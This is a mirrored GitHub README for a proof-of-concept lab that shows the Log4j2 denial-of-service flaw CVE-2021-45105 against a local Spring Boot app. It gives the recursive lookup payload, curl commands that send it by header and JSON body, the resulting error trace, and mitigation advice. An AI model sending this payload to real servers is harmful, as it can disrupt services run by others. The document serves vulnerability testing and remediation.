Giter Club home page Giter Club logo

log4j_dos_cve-2021-45105's Introduction

Log4j2 DOS (CVE-2021-45105)

Poc

${${::-${::-$${::-$}}}}

Versions Affected: all versions from 2.0-beta9 to 2.16.0

This application is based on Spring Boot web application vulnerable to CVE-2021-45105

It uses Log4j 2.16.0

Running the application

Run it:

Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

Exploitation steps

  • Then, trigger the exploit using:
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
  • Notice the output showing Infinite loop, however in testing did not find out that this DOS to be resource consuming as this infinite loop identified by program and error out:

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)

Mitigation :

Java 8 (or later) users should upgrade to release 2.17.0.

Alternatively, this can be mitigated in configuration:

In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC). Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.

Reference

https://issues.apache.org/jira/browse/LOG4J2-3230

log4j_dos_cve-2021-45105's People

Contributors

cckuailong avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.